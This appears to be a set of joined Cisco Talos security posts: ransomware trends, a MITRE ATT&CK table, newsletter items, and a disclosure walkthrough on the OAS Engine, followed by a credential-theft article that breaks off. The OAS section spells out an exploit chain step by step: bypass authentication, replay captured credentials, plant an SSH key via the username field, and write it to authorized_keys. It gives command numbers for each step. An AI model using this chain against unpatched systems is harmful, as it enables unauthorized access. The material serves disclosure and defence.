First discovered in May 2023, BlackSuit ransomware is suspected to be a rebrand of the Royal ransomware operation. Royal, first discovered in September 2022, was hypothesized to be the successor to the Conti ransomware operation that voluntarily shut down in May 2022. Royal and Conti were known for heavily targeting several critical infrastructure sectors, including manufacturing, healthcare and public health (HPH), and education. The BlackSuit ransomware operation has followed this pattern and has been heavily targeting the education sector throughout 2023, which will likely continue into 2024 as the group has already posted a victim in the education industry since the start of the new year.
Cactus ransomware
Talos IR responded to a Cactus ransomware attack for the first time this quarter in an engagement where the adversaries gained access using compromised credentials for a VPN account that was not secured with MFA. Throughout the attack, the adversaries created multiple accounts and added them to the administrator's group, which were then used to evade detection, escalate privileges, and remain persistent in the environment. Attackers moved laterally in the environment by abusing RDP, scheduled tasks, and Windows Management Instrumentation Command (WMIC), techniques commonly observed across similar ransomware attacks. The security registry key file, which contains account policies, user permissions, and encrypted versions of passwords, was duplicated by the threat actors but renamed backward to “ytiruces.” By copying this file, attackers might be trying to maintain access to the credentials, which they can decrypt and use later. Talos IR observed a few other duplicate registry files with reverse names, which could have been a tactic used to mark files that have already been exfiltrated or analyzed.
First discovered in March 2023, Cactus works as a ransomware-as-a-service (RaaS) and is known to exploit vulnerabilities and leverage malvertising lures for initial access. Cactus ransomware targeting and victimology appear to be opportunistic and indiscriminate, appending the file extension “.cts1” to the end of encrypted files, with the numerical value varying between victims. Talos IR observed Cactus ransomware affiliates using custom scripts to disable security tools and distribute the ransomware.
NoEscape ransomware
Talos IR also responded to NoEscape ransomware for the first time this quarter in an engagement in which threat actors leveraged the “Citrix Bleed” authentication bypass vulnerability in Citrix NetScaler web application delivery control (ADC) and Gateway appliances, which Citrix released a patch for in October 2023. Tracked as CVE-2023-4966, this vulnerability allows attackers to bypass password and MFA requirements by obtaining session tokens. While exploitation of CVE-2023-4966 represents a new vulnerability leveraged by NoEscape ransomware affiliates, the targeting of Citrix Bleed is consistent with the group’s previous attacks against virtual desktop infrastructure, and appears to be part of a broader mass campaign initially led by LockBit 3.0 ransomware affiliates. In addition to patching affected systems, Talos also recommends invalidating all active session tokens because if any of the session tokens are stolen they can still be abused by attackers leaving the organization vulnerable to attacks.
After the NoEscape affiliate gained access to the environment, they installed several persistence mechanisms including the ITarian remote monitoring and management (RMM) solution, a remote access utility Talos IR has not previously seen ransomware affiliates use. The adversary leveraged the access granted by ITarian and other tools to steal additional privileged credentials and lay the groundwork for future ransomware deployment. ITarian is highly similar to other RMMs commonly seen in Talos IR ransomware engagements such as TeamViewer, Atera, AnyDesk and Syncro that can access files or workstations remotely. The affiliate also used several other tools commonly seen in pre-ransomware activities, including Cobalt Strike and Sliver, two penetration testing and red team toolkits frequently used for persistence, code execution and lateral movement. The use of Sliver is interesting in that Talos IR has not seen it used in ransomware attack chains since late 2022. The Sliver implants were packed using PEzor, a tool that obfuscates the executables’ contents to prevent anti-virus detection and blocking. Attackers leveraged PsExec to copy and execute two ransomware payloads across the network.
NoEscape is a RaaS that emerged in May 2023 and has used multiple extortion tactics including data theft and distributed denial-of-service (DDoS) attacks to coerce payments from victims. NoEscape operates a profit-sharing model where the ransom proceeds are split between the ransomware’s developers and the affiliates/customers who pay to use it. Consistent with many RaaS groups, NoEscape has indiscriminately targeted organizations of all sizes across many different industries. In December 2023, Talos began monitoring claims on the dark web that NoEscape’s developers executed an “exit scam” in which they stole several of their affiliates' deposits and ransom payouts before possibly shutting down their operation. NoEscape’s leak site was taken down on Dec. 9, 2023, and continues to be offline.
On Dec. 19, 2023, the Federal Bureau of Investigation (FBI) announced a disruption campaign against the ALPHV (BlackCat) ransomware operation, which had been active since late 2021. Although not observed by Talos IR this quarter, ALPHV was one of the most prolific ransomware groups in 2023 following LockBit ransomware. Talos assesses recent law enforcement efforts that may divert additional resources to the LockBit ransomware group, significantly improving their capabilities. Notably, the LockBit ransomware group posted on a Russian-speaking dark web forum in December 2023 offering to recruit ALPHV and NoEscape affiliates as well as any of the ALPHV developers. With a current lack of intelligence regarding this new strategy, it is too early to determine if any of the prospective ALPHV affiliates considered, or moved over to LockBit. However, if ALPHV and LockBit were to collaborate, this potential amalgamation of tactics, techniques and operational capabilities would likely result in more potent and evasive ransomware variants, complicating detection and mitigation efforts, and likely significantly altering the ransomware landscape as we move through the new year.
Other observed threats
In an insider threat engagement, a disgruntled former employee whose account was not properly decommissioned remotely removed all configurations on a network switch before rebooting it, which functionally restored the switch to its factory default configuration. A switch is a piece of hardware that connects network devices and helps manage all of the traffic. When a switch fails, it can lead to network downtime, loss of productivity, and potentially expose the network to security risks. Talos recommends organizations implement secure off-boarding procedures to protect the confidentiality, integrity and availability of sensitive data.
In one cluster of phishing activity, several employees received spear phishing emails with malicious QR codes that, when scanned, led to a fake Microsoft 365 sign-in page, consistent with a growing trend in public reporting. Once the attackers obtained stolen credentials, they proceeded to use an MFA exhaustion attack that resulted in some employees approving the push notifications on their mobile devices. In an MFA exhaustion attack, an adversary hopes to overwhelm users with MFA push notifications in hopes they will inadvertently grant access.
Phishing attacks leveraging QR codes are concerning because if successful, employees will likely use their mobile devices, which leads defenders to lose visibility. Additionally, most email security solutions, such as secure email gateways (SEGs), cannot detect malicious QR codes. With remote work expanding after the COVID-19 pandemic, more employees are accessing business information from their mobile devices. According to a 2023 report, by cybersecurity firm Agency, 97 percent of respondents access their work accounts from their devices. Talos recommends organizations deploy a mobile device management (MDM) platform or similar mobile security tool, such as Cisco Umbrella, to all unmanaged mobile devices that have access to business information.
There was a significant increase in QR code phishing in 2023, according to public reporting. Talos IR responded to a QR code phishing campaign for the first time in an engagement where threat actors tricked victims into scanning malicious QR codes embedded in phishing emails with their mobile devices, thereby leading to malware being executed on the mobile devices. As a result, the attack surface shifts as enterprise security protocols and monitoring systems have less control and visibility over personal devices compared to corporate-managed hardware outside of corporate networks. Additionally, most email security solutions, such as secure email gateways (SEGs) are currently unable to detect malicious QR codes.
Initial access
The top observed means of gaining initial access was tied between using compromised credentials on valid accounts and exploiting public-facing applications, each accounting for 28 percent of engagements, closely followed by phishing. In the phishing engagements this quarter, Talos IR observed a mix of malicious links and QR codes leading to fake login sites crafted to steal credentials.
Security weaknesses
A lack of MFA or proper MFA implementation across all user accounts as well as misconfigured or unpatched systems each played a part in 36 percent of the engagements Talos IR responded to this quarter. Talos IR frequently observes attacks that could have been prevented if MFA was enabled on critical services, such as RDP. Talos IR recommends expanding MFA for all user accounts (e.g., employees, contractors, business partners, etc.).
In some engagements, adversaries attempted to bypass MFA with MFA exhaustion, or fatigue, attacks. Users must have a clear understanding of the appropriate business response protocols when their devices are overwhelmed with an excessive volume of push notifications. We recommend organizations educate their employees about the specific channels and points of contact for reporting these incidents. Prompt and accurate reporting enables security teams to quickly identify the nature of the issue, and implement the necessary measures to address the situation effectively.
Staying up to date with software updates is a crucial aspect of an organization’s security posture, as outdated systems present exploitable avenues for attackers to leverage. Attackers often exploit these software vulnerabilities to achieve a multitude of post-compromise objectives, such as privilege escalation and lateral movement. While vulnerability and patch management are critical, it is not always possible to immediately apply every security patch due to the complexity of enterprise networks. Talos IR recommends prioritizing vulnerabilities that pose the biggest threats to prevent exploitation.
Top observed MITRE ATT&CK techniques
The table below represents the MITRE ATT&CK techniques observed in this quarter’s Talos IR engagements and includes relevant examples. Given that some techniques can fall under multiple tactics, we grouped them under the most relevant tactic based on the way they were leveraged. Please note, this is not an exhaustive list.
Key findings from the MITRE ATT&CK framework include:
Exploitation of public-facing applications was one of the top observed means of gaining initial access this quarter, accounting for 28 percent of total engagements, a slight increase from the previous quarter.
Remote access software, such as ScreenConnect, SplashTop and AnyDesk were used in nearly a fourth of engagements this quarter.
Indicator removal, such as clearing Windows event logs and file deletion, was the top defense evasion technique observed.
In 24 percent of engagements, attackers abused remote services, such as RDP, SSH, and SMB, to move laterally.
Initial Access (TA0001)
Example
T1190 Exploit Public-Facing Application
Attackers successfully exploited a vulnerable application that was publicly exposed to the Internet
T1078 Valid Accounts
Adversary leveraged stolen or compromised credentials
T1566 Phishing
Malicious email sent to trick users into downloading malware
Execution (TA0002)
Example
T1059.001 Command and Scripting Interpreter: PowerShell
Executes PowerShell code to retrieve information about the client’s Active Directory environment
T1059.003 Command and Control Scripting Interpreter: Windows Command Shell
Web shells can run commands on the compromised machine
Persistence (TA0003)
Example
T1053.005 Scheduled Task / Job: Scheduled Task
Scheduled tasks were created on a compromised server
T1136 Create Account
Created a user to add to the local administrator’s group
T1133 External Remote Services
Adversaries use compromised credentials to log into VPNs
Defense Evasion (TA0005)
Example
T1218.011 System Binary Proxy Execution: Rundll32
Attackers can execute malicious DLL files with Rundll32
T1134.002 Access Token Manipulation: Create Process with Token
Attackers created a new process using the command “run as”
T1562.001 Impair Defenses: Disable or Modify Tools
Attackers can disable Windows Defender
Credential Access (TA0006)
Example
T1003.001 OS Credential Dumping: LSASS Memory
Use “lsass.exe” for stealing password hashes from memory
T1003.003 OS Credential Dumping
Use NTDSDump to gather credentials
Discovery (TA0007)
Example
T1018 Remote System Discovery
Adversaries may use ping to discover remote systems
T1482 Domain Trust Discovery
Attackers may obtain information on domain trust relationships
Lateral Movement (TA0008)
Example
T1210 Exploitation of Remote Services
Attackers can abuse remote services, such as RDP
T1021.004 Remote Services: SSH
Adversary made attempts to move laterally using SSH
Collection (TA0009)
Example
T1005 Data from Local System
Attackers can collect and stage data for later exfiltration from infected machines
T1560 Archive Collected Data
Attackers can archive staged data using WinRAR
Command and Control (TA0011)
Example
T1219 Remote Access Software
Remote access tools found on the compromised system
T1105 Ingress Tool Transfer
Attackers can use PowerShell commands, such as “Invoke-WebRequest” to transfer tools from an external system
Exfiltration (TA0010)
Example
T1048.003 Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted Non-C2 Protocol
Using FTP for file exfiltration
T1041 Exfiltration Over C2 Channel
Adversaries may steal data over existing C2 channels
Impact (TA0040)
Example
T1486 Data Encrypted for Impact
Deploy Cactus ransomware and encrypt critical systems
T1486 Inhibit System Recovery
Deleting shadow volume copies before ransomware execution
I just bought an electric car last week, so I’ve been shopping for new car insurance policies that could offer me a discount for ditching gas.
We’re all familiar with the boring process of entering the same information 10 times over into 10 different companies’ websites trying to see who comes out the cheapest and offers the best bundles, discounts or deals.
Unfortunately, with cybersecurity insurance, there are no bundles or “Personal Price Plans” to enroll in, and costs are rising.
This is nothing to say about whether an organization should get cyber insurance. That is 100 percent their decision to make, and every case is going to be different. But for companies who are interested in getting these types of policies to be best prepared to recover from and deal with a potential security incident, it’s now more expensive than ever to get cyber insurance.
This problem isn’t isolated to just the U.S., either. A November report from business continuity service Databarracks surveyed companies in the U.K. and found that nearly a third of respondents said their cyber insurance had increased in cost over the past year, while more companies than ever said they had any type of cyber insurance policy, implying a totally new line item for their budgets.
This rising cost could certainly be attributed to all the classic factors of why anything gets more expensive: market demand, inflation, rising costs of doing business, etc. But an increase in ransomware activity seems to be a large driver, too.
The same Databarracks survey found that 24 percent of all IT downtime for respondents was due to a cyber incident, up 14 percent from 2018. Thirty-seven percent of all companies said they experienced a ransomware attack in 2023, and more than half experienced some sort of security incident in general.
As we saw in our most recent Talos Incident Response Quarterly Trends Report, ransomware may rise again after a relatively quiet period from mid-2022 through the summer of 2023. Ransomware, including pre-ransomware activity, was the top observed threat in the fourth quarter of 2023, accounting for 28 percent of engagements, according to Talos IR, a 17 percent increase from the previous quarter.
That’s not to say that it’s a lock that ransomware attacks are going to be up in 2024, but if they are, cyber insurance policies are only going to get more expensive, which means further shifting budgets for companies of all sizes.
There is no one-size-fits-all approach for how anyone should approach getting a cybersecurity insurance policy. Still, if companies can’t steady the cost of premiums, it may send executives shopping for other, potentially less effective, methods of preparing for a cyber attack.
The one big thing
Cisco Talos Incident Response (Talos IR) saw a significant increase in ransomware activity in its engagements during the fourth quarter of 2023, while education remains one of the most targeted sectors. Talos IR also observed several brand new ransomware operations for the first time in Q4, including Play, Cactus, BlackSuit and NoEscape. The latest Talos IR Quarterly Trends Report has a full breakdown of the top threats they saw in the wild and an idea of where attacker tactics might be headed in 2024.
Why do I care?
This was the first time in all of 2023 that the rate of ransomware attacks rose during IR engagements. Education and manufacturing were tied for the most targeted verticals, accounting for nearly 50 percent of the total number of incident response engagements, so those industries should note Talos IR’s findings.
So now what?
The lack of MFA remains one of the biggest impediments to enterprise security and led to many of the attacks Talos IR saw in Q4. All organizations should implement some form of MFA, such as Cisco Duo.
Top security headlines of the week
One of the largest password dumps ever was posted last week to an online forum, seemingly containing more than 25 million login credentials that had never been leaked before. In all, the collection includes 71 million unique credentials for a range of websites, including the online video game “Roblox,” Yahoo, Facebook and eBay. Though many of these credentials had already been leaked in the past, the user hosting the file claims they all came through an information-stealing malware that collected the usernames and passwords in plain text. Credentials that are stolen via data breaches often contain encrypted passwords. The operator behind the website Have I Been Pwned? first discovered the trove of data earlier this month, but it’s likely been in circulation in various online forums for at least four months. Each line in the dataset, which consists of images and plain text, includes a login URL, the associated account’s name and a password. (Ars Technica, Bleeping Computer)
A new report indicates that each Facebook user could be sharing their personal data with thousands of other companies. The study, conducted by the non-profit Consumer Report, followed more than 700 volunteers’ Facebook accounts and found that, on average, each participant in the study had their data sent to Facebook by 2,230 companies. Some respondents had their data shared with more than 7,000 different companies, and in all, the study captured more than 180,000 organizations that shared data with Facebook. The study was specifically meant to capture “server-to-server” tracking, in which personal data goes from a company’s servers to Meta’s, the parent company of Facebook, servers. The more “traditional” form of tracking for Meta through pixels on other companies’ websites can easily be spotted in a web browser, while server-to-server cannot. The three companies that appeared the most often connected to participants’ accounts in the study were all data brokers, who presumably turned around and sold that data to additional companies for a profit. Consumer Reports listed multiple recommendations for Facebook to improve its data protection, including improving the transparency of Facebook’s data collection tools, making it easier for users to opt out of data sharing and asking the U.S. government to pass data minimization laws. (Consumer Reports, The Markup)
Apple released a series of security updates this week for its devices that fixed three vulnerabilities in the WebKit browser engine that were already being exploited in the wild. One of the vulnerabilities, CVE-2024-23222, is believed to have been exploited in more recent versions of Apple’s mobile operating system iOS. An attacker could exploit this vulnerability to execute remote code on the targeted device. Two other vulnerabilities, CVE-2023-42916 and CVE-2023-42917, were likely exploited in version of iOS dating back to before 16.7.1. The U.S. Cybersecurity and Infrastructure Security Agency added CVE-2024-23222 to its Known Exploited Vulnerabilities (KEV) list. Apple released patches for all its devices, including the Apple TV streaming box, iPad and macOS desktop computers. (SecurityWeek, Computer Weekly)
Open Automation Software recently released patches for multiple vulnerabilities in their OAS Engine.
Cisco Talos publicly disclosed these issues after working with Open Automation Software to ensure that patches were available for users. Now that a fix has been released with Version 19, we want to take the time to dive into a few of these vulnerabilities and show how a handful of bugs that could be viewed as low-impact could be exploited as a series to carry out various malicious actions, even going as far to gaining access to the underlying system.
Background
The OAS Platform facilitates the simplified transfer of data between various proprietary devices and applications. It can connect products from multiple vendors, connect a product to a custom application, and more. Configuration of the platform is possible through TCP/58727 by default.
Vulnerabilities
During this research, we discovered eight vulnerabilities, five of which are covered here. Full technical details can be found in the respective vulnerability reports:
By default, when the OAS Engine is installed, no admin application user is set. Without an admin application user, no authentication is required to access certain functionality that would otherwise require valid credentials, including creating new users. Additionally, if an admin user is created, but the configuration is not saved before the OAS Engine restarts, those changes will be lost and the system will revert to disregarding the authentication structure.
When a privileged request is sent by a legitimate administrator to the OAS Engine, the traffic is sent unencrypted across the wire. As such, it is possible for a bad actor capable of sniffing traffic between the client and OAS Engine to capture a valid U_EP authentication structure. The attacker can then use the structure to craft their successful privileged request. Any captured U_EP remains valid until the associated user account has been deleted.
The OAS configuration tool provides a feature to save the running configuration to disk on the OAS engine server. When this information gets saved, the user specifies the path and filename, restricted only by the permissions of the underlying OAS user system account. If the chosen file already exists, the contents of that file will be replaced with the configuration data.
Access to the various features of the OAS Engine and associated data is controlled through the use of OAS engine application users.
Application administrator users can add additional users to the application with varying levels of permissions. These users exist within the OAS Engine exclusively, not on the underlying system. When adding a user, no filtering is performed on the value entered for the username, allowing a wide variety of characters not appropriate for a username to be entered and subsequently stored in the running configuration.
Through the OAS Configuration tool, the functionality to load a saved configuration from disk or save a running configuration to disk is exposed to authenticated application users.
Accompanying the configuration management tools is a remote file browser that allows users to see what files exist on the remote system.
Attack walkthrough
By combining these vulnerabilities, it is possible to gain access to the underlying system as the user running the OAS Engine.
In this scenario, an adversary could:
Gain access to a valid authentication structure.
Search the filesystem for evidence of an SSH server.
Store an SSH key in the running OAS configuration.
Write the running configuration to disk.
Interacting with the OAS Engine
Before an adversary can make any of the requests needed to exploit the system, they’d need to understand the protocol used by the OAS Configuration utility. These requests consist of two related Protobuf structures — Client_Send and OASPacket — concatenated together and sent to the OAS Engine via TCP/58727 (by default). Responses to these requests will be delivered in a similar format, replacing the Client_Send Protobuf with a Server_Send.
The Server_Send Protobuf takes the following form, where the Handshake and Offset fields must be retained if a subsequent Client_Send is to be sent.
The ClientHandshake and Handshake fields are used in a client/server handshake that is likely in place to prevent replay attacks. ClientHandshake is a randomly generated value less than or equal to 0x3FFFEC75 that will be used in a subsequent request's handshake process. Handshake is a value calculated by taking the Handshake field from the prior Server_Send response, adding it to the Offset field from that same response, subtracting by both 0x12CB and the value of the ClientHandshake field from the prior Client_Send request, and finally adding 0x888. This can be better visualized with the following formula:
The OASPacket Protobuf takes the following form, where LDCMode, LDCHost, and SendingGUID are not always necessary, Version is 0x01, CommandNumber defines the type of request being sent, and DataAsBytes is a set of serialized Protobufs describing the request data.
Many of the requests contain a field of the custom type U_EP. This field contains a serialized copy of credentials used to authenticate privileged requests. The U_EP Protobuf takes the following form, where Version is 0x01, and Seed is a random value used to encrypt the credentials:
By combining the generic structures discussed here with the request-specific structures discussed later, an adversary could replicate the desired communications with the OAS Engine.
Bypass authentication
Many of the requests necessary to successfully interact with the OAS Engine require authentication. At this time, two options exist to bypass this authentication requirement: abusing the default configuration or reusing a valid authentication structure.
Option 1: Abusing Default Configuration
As the requests needed to gain access require authentication, it is necessary first to acquire a valid U_EP structure.
The easiest way to obtain valid credentials is to use the vulnerability disclosed in TALOS-2023-1769. This vulnerability is only exploitable in cases where the OAS Engine is still running its default configuration. To determine if the target in question is vulnerable, an OASPacket with Version set to 0x01 and CommandNumber set to 0x13F can be used. When correctly sent, the server will return a response with the following format:
If the server is vulnerable to TALOS-2023-1769, the MtcExpirationString field will contain the string "Create an Admin User." In this state, the server does not perform any verification of the U_EP structure, allowing privileged requests by unauthenticated users as long as any value is provided in the U_EP field.
If an admin user has already been created, the OAS Engine will not be vulnerable to TALOS-2023-1769 and will require a different approach. The vulnerability disclosed in TALOS-2023-1770 provides an alternative way to obtain a valid U_EP.
Option 2: Pass the U_EP
This vulnerability occurs when legitimate configuration requests, including privileged ones, are sent to the OAS Engine. Most of these messages are sent in cleartext, as disclosed in TALOS-2023-1770. The exception is a field within the U_EP authentication structure, referred to within the OAS Platform as the User_EncryptedPassword. The User_EncryptedPassword is a block of data containing the authenticating username and associated encrypted password that is supplied as a block of AES-encrypted, serialized data to the DataAsBytes field in a U_EP authentication structure, as shown below.
While it is possible to decrypt the User_EncryptedPassword and get access to the raw username and encrypted password (TALOS-2023-1776), it is not necessary for authentication.
When a legitimate U_EP is built, a value is randomly generated and stored in the Seed field of the structure. This seed is subsequently used to build the AES key used to encrypt the User_EncryptedPassword data. This process generally results in a different U_EP value for each new configuration session when conducted through the official tool, but this process does not cause prior sessions to be terminated.
If an attacker obtains access to legitimate configuration traffic by sniffing network traffic, obtaining an old traffic capture, or any other method, they can extract the U_EP structure and successfully authenticate for as long as the associated user exists within the OAS Engine.
Explore the Filesystem
With the ability to successfully send authenticated messages, we can leverage the vulnerability disclosed in TALOS-2023-1774 to explore the filesystem.
From here a variety of approaches could be taken, but for this deep dive, we are looking for the existence of the sshd_config file in /etc/ssh/ and the .ssh directory in the OAS user's home directory, indicating that an SSH server is likely enabled on the system.
We can do this by using an OASPacket with Version set to 0x01 and CommandNumber set to 0x0F. Additionally, the DataAsBytes field will need to be filled with a serialized Browse_File Protobuf containing a valid U_EP, the GetDirectories and GetFiles flags set, a DirectoryPath set to the absolute path of the desired location, and a FileExtension field containing an asterisk to indicate any file type.
After verifying with some certainty that an SSH server is running, it is possible to leverage TALOS-2023-1771 and TALOS-2023-1772 to upload a new SSH key and subsequently gain access to the underlying system.
Since there is not any dedicated file upload functionality exposed by the OAS Engine, it is necessary to get more creative. By combining the improper input validation vulnerability disclosed in TALOS-2023-1772 with the external control of the filename vulnerability disclosed in TALOS-2023-1771, it is possible to create a makeshift file upload process.
💡
It is important to note that while functional for this scenario, this technique will result in a file that cannot be fully controlled. As such, it is likely to create a file that could be considered corrupt by most applications.
When adding a new application user to the OAS Engine, the user details are taken and written to the running OAS Engine configuration. During this process, no verification is performed to ensure that the value entered contains exclusively characters that make sense for a username. Additionally, there is no limit on the length of the username.
By supplying the entirety of an SSH public key that we control as the username of a new entry, it is possible to abuse this lack of verification to get our desired file data stored in the running OAS configuration
We can do this through the use of an OASPacket with Version set to 0x01 and CommandNumber set to 0x88. Additionally, the DataAsBytes field will need to be filled with a serialized String Protobuf containing a Version number, a valid U_EP, and a String value containing the public key data.
With our key stored in the running configuration, we can then trigger it to get written to a file of our choice, in this case, the OAS user's authorized_keys, file, by saving the configuration to disk. While the file will contain a large amount of OAS configuration information that is meaningless to the SSH server, the public key supplied via a username will still be interpreted successfully as long as it is surrounded by newline characters.
We can do this by using an OASPacket with Version set to 0x01 and CommandNumber set to 0x74. The DataAsBytes field must again be filled with a serialized String Protobuf containing a Version number, a valid U_EP, and a String value, this time containing the absolute path to the file where the configuration should be written.
If everything works correctly and the target has its SSH server running, it will be possible to log in as the underlying OS user running the OAS engine via SSH.
Mitigations
Before the release of this walkthrough and the associated vulnerabilities, Cisco Talos worked with Open Automation Software to ensure that patches were made publicly available in Version 19. All users are recommended to upgrade to the latest version.
For Snort coverage, (SIDs 61991 - 61994, 62003, and 62004) that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.
I’d hate to be labeled a “car guy” now mentioning my new electric car in the lede of two newsletters in a row, but I couldn’t resist.
I’d been reading headlines for years about how electric cars (most notably Tesla) were vulnerable to a range of security vulnerabilities, even some that could allow bad actors to steal the car if they were close enough to the car’s keys. While I don’t own a Tesla, I am now more invested in following the various ways attackers can take advantage of the connectivity of electric cars.
I’ve bemoaned before about everything being “smart” now, but there’s no escaping it if you want to convert to an electric vehicle. They’re all Wi-Fi connected so drivers can control the charging speed and timing of their cars, monitor public charging stations and communicate with the dealer about any electrical failures.
A whole new slew of electric car-related vulnerabilities came out last week thanks to the Pwn2Own hacking event in Tokyo as part of the Automotive World conference. Car and charging companies were offering a combined $1 million in bug bounty payments for researchers who could find security vulnerabilities in a range of cars and electric car-related products like home chargers.
In all, researchers discovered 49 zero-day vulnerabilities, including a two-vulnerability exploit chain in Tesla cars that could allow an attacker to take over the onboard infotainment system. Other vulnerabilities were discovered in ChargePoint and Juicebox products, two prominent manufacturers of home, travel and commercial electric charging equipment. Although few details are available on the specific vulnerabilities, the Zero Day Initiative said on its blog that one researcher “was able to execute his attack against the ChargePoint Home Flex.”
Some of these exploits are funny to read about. Imagine an attacker taking the time to hack into a Tesla’s modem so they can turn on a car’s windshield wipers without the driver knowing. Tesla stated after Pwn2Own that none of the vulnerabilities discovered would be more than an annoyance for the driver.
Certainly, previous vulnerabilities that could allow someone to drive away with your car would be more than an annoyance, but this latest batch of bugs has lower stakes than that.
I could see a lot of traditionalists who are hesitant to switch to electric cars being hesitant because their 2011 Toyota Corolla doesn’t require the internet to run. That doesn’t mean that owning an electric car or installing a home charger are inherently risky. I would argue that the average IoT device or home router runs a higher risk of exposing your home network to a larger risk surface because they are often overlooked in security.
As weird as it is to say, just like you patch an IoT device, it’s important to patch the firmware on your vehicle (gas-powered or not) regularly. Still, I’m not sure it’s time to just assume your electric car is going to be hacked like in “Cyberpunk 2077” because these vulnerabilities are out there.
The one big thing
The FBI says it’s shut down the recently emerged Volt Typhoon, a Chinese state-sponsored actor. FBI Director Christopher Wray announced the disruption Wednesday during a hearing with a U.S. House committee. Volt Typhoon was first disclosed in mid-2023 for targeting outdated wireless routers, including some belonging to U.S. critical infrastructure. The hackers had been targeting U.S. water treatment plants, the power grid, oil and natural gas pipelines, and transportation systems, Wray said.
Why do I care?
Aging network infrastructure is a problem for all users across the globe. As highlighted by Talos’ report on JaguarTooth last year, unpatched routers or older routers with security vulnerabilities are easy targets for state-sponsored actors, and they can often sit unnoticed on these devices for months or years. Volt Typhoon is particularly notable for its targeting of high-risk sectors and U.S. military bases.
So now what?
The FBI and U.S. Cybersecurity and Infrastructure Security Agency warned router vendors to patch their devices as soon as possible to prevent the exploitation of vulnerabilities Volt Typhoon is known for using. All users should check to make sure their routers, regardless of make, model or age, have the latest firmware installed. We also have several recommendations for everyone to defend their network infrastructure and upgrade to newer hardware.
Top security headlines of the week
Ads displayed in several different popular mobile apps are part of a mass global surveillance effort, with the information eventually being sold to national security agencies that can track the physical location, hobbies, and names of users’ family members. The ad-based tool, known as Patternz, strikes deals with smaller ad networks to gather information from users’ devices when they access some apps like Kik messenger and the 9gag online forum. While reporting from 404 Media shows a specific example targeting an Android user, the same methods work on iOS devices. Separately, security researchers also found that many push notifications on iPhones are unknowingly sending user information back to apps, even if the user doesn’t have those apps installed. When triggered, some push notifications will send app analytics and device information to remote servers belonging to other apps like TikTok, Facebook, Instagram and X, formerly known as Twitter. (404 Media, 9to5 Mac)
A cyber attack disrupted nearly all the government services of Fulton County, Georgia, this week, with systems still recovering as of Wednesday afternoon. The attack is notable because Fulton County is where former U.S. President Donald Trump is charged and being tried for his involvement in trying to overturn the results of the 202 presidential election. The cyber attack also targeted the office of the District Attorney who investigated and is charging Trump. The county’s government phone systems were all down, as were access to court filings, tax processing and more. Law enforcement was still investigating the attack as of Wednesday afternoon, though county officials said they had not seen any evidence that personal information of employees or citizens had been stolen. (NBC News, CNN)
Cozy Bear, a well-known Russian APT, is reportedly behind two recent breaches at Microsoft and Hewlett Packard Enterprise (HPE). Microsoft, calling the group “Midnight Blizzard” said in a blog post that they detected a state-sponsored attack on their internal systems on Jan. 12, 2024. Microsoft stated that the actor got in by abusing user accounts “to create, modify, and grant high permissions to OAuth applications that they can misuse to hide malicious activity.” This was the second time in six months that Microsoft disclosed a state-sponsored actor targeting its internal systems. In the case of Cozy Bear, the hacking group allegedly monitored the email accounts of senior Microsoft executives and members of the company’s cybersecurity teams. Executives from HPE filed a notice with the U.S. Securities and Exchange Commission last week stating that the same actor “gained unauthorized access to HPE’s cloud-based email environment.” HPE said the actor initially gained access through a compromised Microsoft Office 365 email account. (Microsoft, Ars Technica)
Can’t get enough Talos?
Most prevalent malware files from Talos telemetry over the past week
You’ve no doubt heard the phrase, “Attackers don’t hack anyone these days. They log on.”
By obtaining (or stealing) valid user account details, an attacker can gain access to a system, remain hidden, and then elevate their privileges to “log in” to more areas of the network.
Unfortunately, the use of valid accounts is prevalent across the threat landscape. It was the second-most common MITRE ATT&CK technique that Talos observed inour threat telemetry in 2023. 26% of all Cisco Talos Incident Response engagements last year involved the use of valid accounts.
In figures from Incident Response engagements from the fourth quarter of 2023 , the top means of gaining initial access was a tie between the use of compromised credentials on valid accounts and exploiting public-facing web applications. 36% of malicious tooling was also focused on accessing and collecting credentials. You can read more about this in our Incident Response Quarterly Trends report.
The pervasiveness of these types of attacks is driven by a few key reasons:
Most companies think that cyber attacks will come from “the outside in.”
Attacks that use valid accounts to log on take more of an “inside-out” approach. Once the initial access is gained, they are stealthily inside the network and there is more of a chance that the attacker will evade detection as they are trying to move laterally. Especially if the network is unsegmented. Long story short — exploiting a vulnerability can certainly lead to initial access, but authorized credentials help the adversary navigate laterally under the radar.
Stolen credentials are for sale on the dark web.
Effectively, some threat actors are in the market of stealing credentials simply to sell them to the highest bidder. Actors who purchase them may well use them for a larger targeted ransomware campaign and/or for espionage purposes. For account details that come with high privileges (for example, those who work in finance or have access to networking devices), the bigger the price.
Attackers are following the trends of how we work today.
We’re accessing more systems remotely, we’re accessing company systems on our own devices, and cloud solutions are becoming increasingly commonplace. From a threat actor perspective, their mindset is shifting. “Why force my way into a system when I can just log in?”
Speaking to those remote working trends, across the broader Cisco organization, we now see 1.5 billion multi-factor authentication requests every month (via Cisco Duo). For each authentication request, Duo evaluates what is a request from a trusted user, compared to a bad request from an attacker.
The lack of MFA (or poorly installed MFA) is frequently the No. 1 security weakness in our Talos Incident Response Quarterly Trends report (as was the case in Q4 2023). According to Oort, whom Cisco acquired in 2023, 40% of enterprise customers have no MFA, or use weak MFA (for example, clear text SMS). This appears to be contributing to the challenge of bad actors using valid accounts as a key initial access tactic.
So how are attackers effectively ‘logging on’ with valid account credentials? Here are some tactics that we frequently encounter within Talos threat telemetry and Incident Response engagements:
Credentials stolen from password stores
Stolen credentials from password stores took the No. 4 spot in the top 20 list of the most common MITRE ATT&CK techniques Talos saw in 2023. This is when users store passwords on various applications or web browsers. Adversaries search across common password storage locations to look for passwords that have been stored there. This technique has been used by threat actors for many years, but the rate at which this is still happening highlights the need for why organizations and individuals should be using password managers and not the built-in ones in web browsers.
Credentials stolen from fake login portals via phishing campaigns
Attackers will often try and replicate common login portals, such as Microsoft Office 365, and may send the user a phishing email asking them to log in due to some issue with their account. On the surface, the web page looks legitimate, but it’s a fake copy with malicious software behind it which is designed to capture user account details.
Input capture
Input capture was seventh on the top 20 MITRE ATT&CK list. This is a technique where threat actors will deploy methods to capture login data that is inputted by the user. The most prevalent type of input capture is keylogging, where adversaries may log user keystrokes to intercept credentials as the user types them. Keylogging usually occurs after a user is the unwitting victim of stolen credentials via a phishing campaign or other means of access.
Stealing or Forging Kerberos Tickets
